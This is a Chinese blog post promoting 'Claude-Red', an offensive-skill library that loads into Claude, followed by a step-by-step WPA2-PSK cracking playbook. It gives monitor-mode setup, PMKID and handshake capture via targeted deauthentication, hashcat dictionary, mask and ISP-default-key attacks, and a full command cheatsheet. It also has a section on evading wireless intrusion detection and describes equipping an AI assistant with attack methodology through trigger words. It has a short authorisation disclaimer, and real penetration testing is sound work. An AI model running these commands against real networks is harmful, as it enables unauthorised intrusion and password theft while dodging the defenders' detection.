news 2026/9/16 13:59:00

Claude-Red WPA2-PSK 攻击终极指南:握手捕获、PMKID 与 hashcat GPU 爆破

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
Claude-Red WPA2-PSK 攻击终极指南:握手捕获、PMKID 与 hashcat GPU 爆破

Claude-Red WPA2-PSK 攻击终极指南:握手捕获、PMKID 与 hashcat GPU 爆破

【免费下载链接】Claude-Redclaude-red is a curated library of offensive security skills designed for the Claude skills system. Each skill is a structured SKILL.md file that primes Claude with expert-level methodology for a specific attack surface — from SQLi to shellcode, EDR evasion to exploit development.项目地址: https://gitcode.com/GitHub_Trending/cl/Claude-Red

claude-red是一个面向 Claude 技能的攻击性安全技能库(offensive security skills),其中 offensive-wpa2-psk 技能专门覆盖 WPA2-PSK 攻击方法论:通过定向去认证捕获四路握手(four-way handshake)、无客户端的 PMKID 攻击、hcxtools 格式转换,以及 hashcat 22000 模式的 GPU 加速爆破。对于几乎每台家用和小型企业路由器默认启用的 WPA/WPA2 Personal 加密,这套离线爆破流程是无线渗透测试中最经典、最实用的攻击路径。


为什么 WPA2-PSK 是无线渗透测试的首选目标

WPA2-PSK(即"个人版"Wi-Fi 加密)是消费级和小微企业网络事实上的默认加密方式。它的安全性高度依赖预共享密钥(PSK)的强度,而这恰恰是最常见的短板:

  • 📡离线爆破友好:捕获握手或 PMKID 后即可离线爆破,无在线尝试次数限制、无账户锁定
  • 🔑弱口令普遍:运营商默认密码(10 位数字)、手机号、公司名 + 年份……弱口令在 PSK 中极其常见
  • 📊检测面小:除去认证帧外几乎没有"在线探测"信号;若走 PMKID 路径甚至完全静默

claude-red 项目的无线分类(Wireless)共提供 13 个技能,覆盖从 802.11 总览到蓝牙、Zigbee、LoRaWAN 的完整攻击面,本技能是其中的核心实战技能之一。

快速上手:一键安装 claude-red

将技能文件放入 Claude 的技能目录即可,Claude 会在对话中提到 WPA2-PSK、握手、PMKID 等触发词时自动加载该技能:

# 克隆到 Claude 扫描的目录 git clone https://gitcode.com/GitHub_Trending/cl/Claude-Red ~/.claude/skills/claude-red # 或只安装无线分类(节省空间) ./install.sh --target ~/.claude/skills --category wireless

安装脚本见 install.sh,完整技能清单见 claude-skills.json 与 README.md。

环境准备:无线网卡与监听模式

一切攻击的前提是监听模式 + 注入能力。技能库中的 offensive-wifi-recon 技能给出了完整的环境准备清单:

步骤命令说明
终止冲突服务sudo airmon-ng check kill停掉 NetworkManager 等干扰进程
开启监听模式sudo airmon-ng start wlan0生成wlan0mon接口
设置监管域sudo iw reg set US解锁合法信道与发射功率
验证注入能力sudo aireplay-ng --test wlan0mon建议达到 30/30 确认率

💡网卡选择提示:2.4 GHz 可选 Atheros AR9271(Alfa AWUS036NHA),双频段可选 Realtek RTL8812AU(AWUS036ACH),6 GHz 频段需 Wi-Fi 6E 网卡。详见 offensive-wifi-recon 技能。

第一步:优先尝试 PMKID 捕获(最安静)

PMKID 包含在四路握手的第一条消息中,而许多 AP 会响应一次关联请求就直接泄露 PMKID——不需要任何真实客户端参与,是最安静的捕获方式:

# 目标 BSSID 列表(每行一个,必须是你有授权测试的设备) echo "AA:BB:CC:DD:EE:FF" > targets.txt # 用 hcxdumptool 扫描捕获 PMKID sudo hcxdumptool -i wlan0mon -o pmkid.pcapng \ --enable_status=1 --filterlist_ap=targets.txt --filtermode=2 # 转换为 hashcat 22000 格式 hcxpcapngtool -o hash.hc22000 pmkid.pcapng
  • --filtermode=2表示只对授权列表中的 BSSID 发起请求,大幅降低被 WIDS 注意的概率
  • 如果转换出的hash.hc22000,说明该 AP 不泄露 PMKID → 转入下一步握手捕获

第二步:四路握手捕获(定向去认证)

PMKID 拿不到时,就逼客户端重连。核心思路:定向对单个客户端发送少量去认证帧,而非广播风暴。

# 1. 锁定信道,开始抓包 sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon # 2. 对单个客户端发送 5 次定向去认证(低噪音) sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon

握手出现时,airodump 右上角会显示WPA handshake: AA:BB:CC:DD:EE:FF

为什么要定向去认证?广播去认证(不带-c)会立刻触发 WIDS 告警,相当于对着整个网络"开炮"。而 3~10 帧的单个客户端去认证常被误判为漫游行为或射频噪声——这一点在 offensive-deauth-disassoc 技能 的检测对照表中有详细说明。

验证捕获质量:M1+M2 才是有效握手

不是所有抓到的握手都能破解。用 hcxpcapngtool 转换时检查输出:

hcxpcapngtool -o hash.hc22000 handshake-01.cap # 期望看到 "M1+M2 ... AUTHORIZED" 或 "M2 ... AUTHORIZED"

若工具报告 M1/M2 帧缺少正确的 EAPOL 认证信息,说明握手不完整——重新捕获,否则后续爆破必定失败。这是新手最常踩的坑。

hashcat GPU 爆破:三种攻击模式

拿到hash.hc22000文件后,用 hashcat 的22000 模式(WPA-PBKDF2-SHA1)进行 GPU 加速爆破。技能中给出三条递进的路径:

1️⃣ 字典 + 规则(首选)

hashcat -m 22000 hash.hc22000 wordlist.txt -r rules/OneRuleToRuleThemAll.rule

推荐词库:

词库特点
rockyou.txt经典入门词库
weakpass_3/weakpass_4大规模泄露密码语料
crackstation.txt高命中率补充词库
定向词库公司名、产品名、地名 + 年份/手机号变形

2️⃣ 掩码攻击:打中运营商默认密码规律

许多 ISP 路由器的默认 PSK 是纯数字,掩码攻击比盲目字典更快命中:

# 10 位数字(UPC、Vodafone 等常见 ISP 默认) hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d?d?d # 8 位数字(D-Link、ZTE) hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d # 手机号模式 hashcat -m 22000 hash.hc22000 -a 3 1?d?d?d?d?d?d?d?d?d?d

3️⃣ 厂商默认密钥生成器

部分运营商路由器的 PSK 由SSID 前缀 + 序列号后缀通过已知算法推导而来,可离线批量生成候选密钥:

# UPC 路由器:根据 ESSID 生成候选 PSK 再爆破 upc_keys ESSID | hashcat -m 22000 hash.hc22000 -

其他品牌可查找对应生成器(如 BT-Hub、Zyxel 等),按路由器品牌选择工具。

性能调优与分布式破解

# 查看每块 GPU 的推荐线程/工作组配置 hashcat -b -m 22000 # 多机/多卡分片:把词库切段,各机各跑一段 hashcat -m 22000 hash.hc22000 wordlist.txt -s 0 -l 1000000 hashcat -m 22000 hash.hc22000 wordlist.txt -s 1000000 -l 1000000

⚡ GPU 在 PBKDF2-SHA1 这种 CPU 密集型哈希上优势依然显著,hashcat -b给出的 workload 调优参数能直接提升 20%~40% 的 Hashrate。

完整作战速查表(Engagement Cheatsheet)

技能文件末尾给出了一条龙的实战流程,这里按阶段归纳:

# 1️⃣ 环境准备 sudo airmon-ng check kill && sudo airmon-ng start wlan0 sudo iw reg set US # 2️⃣ 先扫 PMKID(静默) echo "AA:BB:CC:DD:EE:FF" > targets.txt sudo hcxdumptool -i wlan0mon -o pmkid.pcapng \ --enable_status=1 --filterlist_ap=targets.txt --filtermode=2 # 3️⃣ 转换并尝试破解 hcxpcapngtool -o hash.hc22000 pmkid.pcapng hashcat -m 22000 hash.hc22000 wordlist.txt -r best64.rule # 4️⃣ PMKID 为空?转入四路握手捕获 sudo airodump-ng -c <ch> --bssid AA:BB:CC:DD:EE:FF -w cap wlan0mon & sudo aireplay-ng --deauth 3 -a AA:BB:CC:DD:EE:FF -c <client> wlan0mon # 5️⃣ 转换 + 字典爆破 hcxpcapngtool -o hash.hc22000 cap-01.cap hashcat -m 22000 hash.hc22000 wordlist.txt -r OneRuleToRuleThemAll.rule # 6️⃣ 字典失败 → 掩码攻击 hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d?d?d

降低被检测概率的注意事项

检测信号防御方视角应对建议
去认证突发WIDS 规则:单位时间去认证帧超阈值单客户端 3~10 帧突发,避免广播
PMKID 请求洪水单 MAC 快速关联告警使用--filtermode=2只扫授权列表
监听模式接口企业 WIDS 会指纹识别邻接监听无线电每次捕获间随机化源 MAC

此外,若网络启用了802.11r(快速漫游),AP 间切换时 PMK 推导过程可被捕获,同样可用 hc22000 格式破解;启用 OKC(机会性密钥缓存)的网络则会在空中产生更少的 M1/M2 帧对,需要更长捕获时间。

合规提示

⚠️ 本文所有技术细节仅限在已获得书面授权的网络上使用:授权渗透测试项目、自有设备、CTF 演练与教学环境。技能文件本身也明确要求targets.txt只能包含你被授权测试的 BSSID。未经授权的无线入侵在绝大多数司法辖区属于违法行为。

延伸阅读

  • 核心技能:Skills/wireless/offensive-wpa2-psk/SKILL.md
  • 前期侦察:Skills/wireless/offensive-wifi-recon/SKILL.md
  • 去认证细节:Skills/wireless/offensive-deauth-disassoc/SKILL.md
  • WPA3 攻击路径:Skills/wireless/offensive-wpa3-sae/SKILL.md
  • 全库技能地图:MINDMAP.md | 项目说明:README.md

【免费下载链接】Claude-Redclaude-red is a curated library of offensive security skills designed for the Claude skills system. Each skill is a structured SKILL.md file that primes Claude with expert-level methodology for a specific attack surface — from SQLi to shellcode, EDR evasion to exploit development.项目地址: https://gitcode.com/GitHub_Trending/cl/Claude-Red

创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/9/16 13:56:46

Mautic 自托管教程:在自有服务器上跑通开源营销自动化

Mautic 自托管教程&#xff1a;在自有服务器上跑通开源营销自动化 【免费下载链接】mautic Mautic: Open Source Marketing Automation Software. 项目地址: https://gitcode.com/GitHub_Trending/ma/mautic 这篇文章面向有服务器、但没用过营销自动化工具的人。跟着步骤…

作者头像 李华
网站建设 2026/9/16 13:53:57

FPGA实现PWM波形生成:Verilog计数器比较器设计与Vivado仿真

简介&#xff1a;基于现场可编程门阵列的脉宽调制工程资料&#xff0c;面向本硕博及教研人群&#xff0c;以Vivado2019.2为平台&#xff0c;通过Verilog语言实现&#xff0c;并配套操作录像&#xff0c;适合从零学习脉宽调制算法的现场可编程门阵列编程与仿真验证。压缩包共101…

作者头像 李华